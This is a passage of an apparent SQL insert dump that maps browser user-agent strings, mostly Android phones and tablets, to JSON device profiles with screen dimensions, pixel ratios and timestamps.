10; ELE-L29; HMSCore 6.6; GMSCore 22.24) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1657976696),('Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-A325F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1688372868),('Mozilla/5.0 (Linux; Android 12; LE2123) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":858,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1669456092),('Mozilla/5.0 (Linux; Android 12; SM-A325F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1705088830),('Mozilla/5.0 (Linux; Android 12; SM-N976B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1658412033),('Mozilla/5.0 (Linux; Android 10; ART-L29; HMSCore 6.6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1658506908),('Mozilla/5.0 (Linux; Android 10; Lenovo TB-X306X) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1674399919),('Mozilla/5.0 (Linux; Android 10; JNY-LX1; HMSCore 6.6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":770,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1676701507),('Mozilla/5.0 (Linux; Android 10; VOG-L29; HMSCore 6.6; GMSCore 22.24) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1658667647),('Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-G781B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1704177908),('Mozilla/5.0 (Linux; Android 12; IN2023) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":845,\"pixelRatio\":3.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1658863999),('Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1748089030),('Mozilla/5.0 (Linux; Android 11; 21051182G) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1681286884),('Mozilla/5.0 (Linux; Android 12; SM-A536B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1700644813),('Mozilla/5.0 (Linux; Android 12; SM-A127F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1669919961),('Mozilla/5.0 (Wayland; Linux x86_64) Gecko/* Firefox/*','',1659167805),('Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-G981B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1661263589),('Mozilla/5.0 (Linux; Android 12; POCO F2 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1721127784),('Mozilla/5.0 (Linux; Android 12; SM-T875) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1659368744),('Mozilla/5.0 (Linux; Android 12; xx 10T Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1659512227),('Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-A127F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1659552209),('Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A037G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1659700532),('Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-S901B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1683378912),('Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-N976B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1660075123),('Mozilla/5.0 (compatible; MSIE 1.0; Linux x86_64; Tablet PC; Trident/3.0)','',1660148113),('Mozilla/5.0 (Linux; Android 12; SM-A217F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1743487242),('Mozilla/5.0 (Linux; Android 12; XQ-BT52) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":960,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1660394659),('Mozilla/5.0 (Linux; Android 10; ELS-NX9; HMSCore 6.5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1660467067),('Mozilla/5.0 (Linux; Android 12; M2103K19PG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1660506743),('Mozilla/5.0 (Linux; Android 11; 2201117SY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1687005548),('Mozilla/5.0 (Linux; Android 7.*; vivo X9s Plus L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1660832199),('Mozilla/4.05 (Macintosh; 68K Nav)','',1660864853),('Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-A515F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1666970798),('Mozilla/5.0 (Android 12; Mobile) Firefox/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1717241660),('Mozilla/5.0 (Linux; Android 10; SM-T595) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1661079782),('Mozilla/5.0 (Linux; Android 12; ASUS_I005DA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1661327976),('Mozilla/5.0 (Linux; Android 12; SM-A226B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1681889679),('Mozilla/5.0 (Linux; Android 10; JNY-LX1; HMSCore 6.5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":770,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1661425615),('Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-S908B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1681754646),('Mozilla/5.0 (Linux; Android 12; 2107113SG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1683372069),('Mozilla/5.0 Firefox/*','',1742142873),('Mozilla/5.0 (Linux; Android 12; M2101K7BNY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1681148885),('Mozilla/5.0 (Linux; Android 11; SM-A015V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1662234887),('Mozilla/5.0 (Linux; Android 10; M40(N9H3)) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1662399581),('Mozilla/5.0 (Linux; Android 10; MAR-LX1A; HMSCore 5.0; GMSCore 22.26) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1662404367),('Mozilla/5.0 (Linux; Android 12; SM-F926B) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":872,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1670762005),('Mozilla/5.0 (Linux; Android 12; Pixel 3a XL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1680946480),('Mozilla/2.0 (compatible; Ask Jeeves/Teoma)','',1662928228),('Mozilla/5.0 (iPhone; CPU iPhone OS 16 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":320,\"screenHeight\":480,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1748330339),('Mozilla/5.0 (Linux; Android 7.*; OPPO R11st) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1663078431),('Mozilla/5.0 (Linux; Android 12; Redmi Note 9 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1715416425),('Mozilla/5.0 (Linux; Android 11; S62 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1663217836),('Mozilla/5.0 (Linux; Android 12; xx Note 10 Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1663307086),('Mozilla/5.0 zgrab/0.x','',1748525503),('Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-A226B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":857,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1689085697),('Mozilla/5.0 (Linux; Android 12; SM-P610) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1674844396),('Mozilla/5.0 (Linux; Android 8.*; jhs561) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1708716150),('Mozilla/5.0 (Linux; Android 12; A063) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1664011668),('Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-S906B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1708201150),('Mozilla/5.0 (Linux; Android 13; Pixel 4a (5G)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1734351520),('Mozilla/5.0 (Linux; Android 10; WP6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1664876179),('Mozilla/5.0 (compatible)','{\"type\":\"desktop\",\"markup\":\"\"}',1746379096),('Mozilla/5.0 (Linux; Android 12; SM-G715FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1665417649),('Mozilla/5.0 (iPhone; CPU iPhone OS 15 like Mac OS X) AppleWebKit/* (KHTML, like Gecko),2 Mobile/* Safari/*','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":428,\"screenHeight\":926,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1721895843),('Microsoft Office Word 2014','',1715684673),('Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-A415F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1737061516),('Mozilla/5.0 (iPad; CPU OS 15 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1708360759),('Mozilla/5.0 (Linux; Android 12; M2007J20CG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1682962751),('Mozilla/5.0 (Linux; Android 12; Nokia XR20) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":432,\"screenHeight\":960,\"pixelRatio\":2.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1666203470),('Mozilla/5.0 (iPhone; CPU iPhone OS 16 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/*','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":320,\"screenHeight\":480,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1741859746),('Mozilla/5.0 (Linux; Android 12; IN2013) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1668159906),('Mozilla/5.0 (Linux; Android 13; Pixel 6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1698502681),('Mozilla/5.0 (Linux; Android 10; JNY-LX1; HMSCore 6.7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":770,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1667064271),('Mozilla/5.0 (Linux; Android 12; KB2003) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1667123135),('Mozilla/5.0 (Linux; Android 12; SM-A336B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1669573615),('Mozilla/5.0 (Linux; Android 12; SM-M515F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1686513124),('Mozilla/5.0 (Linux; Android 12; SM-S906B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1667505160),('Mozilla/5.0 (Linux; Android 12; M2002J9G) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1667628394),('Mozilla/5.0 (Linux; Android 12; 2201123G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1667756954),('Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-S901B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1704574013),('Mozilla/5.0 (Linux; Android 12; SM-A137F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1698782120),('Mozilla/5.0 (Maemo; Linux armv7l) Gecko/* Firefox/*','',1668584981),('Mozilla/5.0 (Linux; Android 13; Pixel 4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":830,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1668681212),('Mozilla/5.0 (Linux; Android 12; SM-A025G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1725089144),('Mozilla/5.0 (Linux; Android 13; SM-G998B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":3.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1679381287),('Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-A217F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1723809225),('Mozilla/5.0 (Linux; Android 11; 2201116SG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1690016163),('Mozilla/5.0 (Linux; Android 13; SM-G986B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1703880093),('Mozilla/5.0 (Linux; Android 13; SM-G991B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1703788264),('Mozilla/5.0 (Linux; Android 13; SM-G980F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1692272354),('Mozilla/5.0 (Linux; Android 10; EML-L29; HMSCore 6.8; GMSCore 22.44) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1669480287),('Mozilla/5.0 (Linux; Android 9; BDL8051C) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1694662152),('Mozilla/5.0 (Linux; Android 8.*; MHA-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1671044715),('Mozilla/5.0 (Linux; Android 12; 